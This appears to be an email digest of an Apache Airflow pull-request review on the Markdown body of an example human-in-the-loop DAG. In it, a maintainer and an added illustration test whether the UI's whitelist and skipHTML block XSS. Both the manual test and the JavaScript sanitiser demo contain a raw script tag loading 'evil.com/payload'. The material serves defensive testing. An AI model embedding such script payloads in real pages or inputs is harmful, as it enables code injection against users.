guan404ming commented on code in PR #54166:
URL: https://github.com/apache/airflow/pull/54166#discussion_r2262352117


##########
providers/standard/src/airflow/providers/standard/example_dags/example_hitl_operator.py:
##########
@@ -125,10 +125,11 @@ def notify(self, context: Context) -> None:
         task_id="valid_input_and_options",
         subject="Are the following input and options valid?",
         body="""
-        Input: {{ 
ti.xcom_pull(task_ids='wait_for_input')["params_input"]["information"] }}
-        Option: {{ ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] 
}}
-        Multiple Options: {{ 
ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
-        Timeout Option: {{ 
ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
+**Collected Information**
+- Input: {{ 
ti.xcom_pull(task_ids='wait_for_input')["params_input"]["information"] }}
+- Option: {{ ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
+- Multiple Options: {{ 
ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
+- Timeout Option: {{ 
ti.xcom_pull(task_ids='wait_for_option')["chosen_options"] }}
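Review bot: the `Multiple Options` and `Timeout Option` lines pull `chosen_options` from the same `wait_for_option` task as the `Option` line, so all three items render the identical value; if the example DAG has separate tasks for the multiple-choice and timeout cases, point those two `xcom_pull` calls at their `task_id`s, otherwise drop the duplicate lines. Separately, the list items interpolate the responder-supplied `params_input["information"]` straight into Markdown that the UI renders, so the body's safety rests entirely on the UI's Markdown sanitisation (the component whitelist and `skipHTML` discussed in the comment below); a short comment in the body string noting that these values are untrusted would make that dependency explicit for anyone copying the example.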

Review Comment:
   > We also have certain protections in the frontend, such as using a component whitelist in [ReactMarkdown.tsx](https://github.com/apache/airflow/blob/main/airflow-core/src/airflow/ui/src/components/ReactMarkdown.tsx) and passing skipHTML to prevent XSS.
   
   <img width="1023" height="256" alt="image" src="https://github.com/user-attachments/assets/b7a4fdf7-7790-4c5d-8600-ff2af2014b76" />
   
   ```python
   import datetime

   from airflow.providers.standard.operators.hitl import ApprovalOperator

   # Manual test: the body deliberately carries a Markdown heading and a raw
   # <script> tag to check what the UI's Markdown renderer does with them.
   valid_input_and_options = ApprovalOperator(
       task_id="valid_input_and_options",
       subject="Are the following input and options valid?",
       body="""
   * Input: {{ task_instance.xcom_pull(task_ids='wait_for_input', key='return_value')["params_input"]["information"] }}
   * Option: {{ task_instance.xcom_pull(task_ids='wait_for_option', key='return_value')["chosen_options"] }}
   ## Hi XSS
   
   <script src="evil.com/payload"></script>
       """,
       defaults="Reject",
       execution_timeout=datetime.timedelta(minutes=1),
   )
   ```
   
   Since we have a whitelist in [ReactMarkdown.tsx](https://github.com/apache/airflow/blob/main/airflow-core/src/airflow/ui/src/components/ReactMarkdown.tsx), it would only render accepted tags for formatting. Also, we pass `skipHTML`, which ignores HTML in Markdown completely; see the [react-markdown implementation](https://github.com/search?q=repo%3Aremarkjs%2Freact-markdown%20skipHTML&type=code). IMHO, it would not directly result in an HTML script tag, either theoretically or in the manual tests above.
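The comment above relies on two renderer-side controls: an allow-list of element types the Markdown component may emit, and a `skipHtml` switch that discards raw HTML nodes. The following is an added illustration, not code from Airflow, react-markdown or the PR, that models both controls in a minimal line-oriented Markdown renderer. It handles only a Markdown subset (ATX headings, `-`/`*` list items, `**bold**`, raw HTML lines, paragraphs); the `skipHtml: false` branch stands in for a renderer configured to pass raw HTML through and is not a claim about react-markdown's default behaviour; the sample body is constructed, with the raw `<script>` line taken from the manual test above.

```javascript
// Added example, not code from Airflow or react-markdown: a small line-oriented
// Markdown renderer modelling the two defences cited in the review comment:
// an allow-list of element types that may be emitted, and a skipHtml switch
// that discards raw HTML nodes instead of emitting them.

const DEFAULT_ALLOWED = new Set(["h1", "h2", "p", "ul", "li", "strong"]);

// Escape text content so user-supplied characters can never open or close a tag.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Parse a Markdown subset (ATX headings, "-"/"*" list items, raw HTML lines,
// paragraphs) into a flat list of block nodes, one per non-blank line.
function parseBlocks(markdown) {
  const nodes = [];
  for (const raw of markdown.split("\n")) {
    const line = raw.trim();
    if (!line) continue;
    let m;
    if ((m = /^(#{1,2})\s+(.*)$/.exec(line))) {
      nodes.push({ type: "heading", depth: m[1].length, text: m[2] });
    } else if ((m = /^[-*]\s+(.*)$/.exec(line))) {
      nodes.push({ type: "listItem", text: m[1] });
    } else if (/^<[a-zA-Z!\/]/.test(line)) {
      nodes.push({ type: "html", value: line });
    } else {
      nodes.push({ type: "paragraph", text: line });
    }
  }
  return nodes;
}

// Wrap content in a tag only if that tag is allow-listed; otherwise emit the
// content bare, which is how a component allow-list degrades unknown elements.
function wrap(tag, inner, allowed) {
  return allowed.has(tag) ? `<${tag}>${inner}</${tag}>` : inner;
}

// Inline rendering: escape first, then reintroduce only **bold** as <strong>.
function renderInline(text, allowed) {
  return escapeHtml(text).replace(/\*\*(.+?)\*\*/g, (_, inner) => wrap("strong", inner, allowed));
}

function renderMarkdown(markdown, { skipHtml = true, allowed = DEFAULT_ALLOWED } = {}) {
  const out = [];
  let items = [];
  const flushList = () => {
    if (items.length) {
      out.push(wrap("ul", items.join(""), allowed));
      items = [];
    }
  };
  for (const node of parseBlocks(markdown)) {
    if (node.type === "listItem") {
      items.push(wrap("li", renderInline(node.text, allowed), allowed));
      continue;
    }
    flushList();
    if (node.type === "heading") {
      out.push(wrap(`h${node.depth}`, renderInline(node.text, allowed), allowed));
    } else if (node.type === "html") {
      // skipHtml drops the raw node entirely. The false branch models a renderer
      // configured to pass raw HTML through, which is what would turn Markdown in
      // a HITL body into script execution in the UI.
      if (!skipHtml) out.push(node.value);
    } else {
      out.push(wrap("p", renderInline(node.text, allowed), allowed));
    }
  }
  flushList();
  return out.join("\n");
}

// Constructed stand-in for a HITL body after Jinja substitution. The values are
// made up; the raw <script> line is the one used in the manual test above.
const SAMPLE_BODY = `
**Collected Information**
- Input: Q3 report <b>draft</b>
- Option: Approve
## Hi XSS

<script src="evil.com/payload"></script>
`;

function demo() {
  const safe = renderMarkdown(SAMPLE_BODY);
  const passthrough = renderMarkdown(SAMPLE_BODY, { skipHtml: false });
  console.log("skipHtml=true:\n" + safe);
  console.log("\nskipHtml=false (unsafe model):\n" + passthrough);
  return { safe, passthrough };
}

demo();
```

With `skipHtml` on, the `## Hi XSS` line becomes a harmless `<h2>`, the inline `<b>` inside the XCom value is escaped to text, and the raw `<script>` line is dropped; only the passthrough model emits it. Restricting `allowed` further (for example to `new Set(["p"])`) shows the allow-list fallback: a heading whose tag is not permitted renders as bare text.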
   



-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
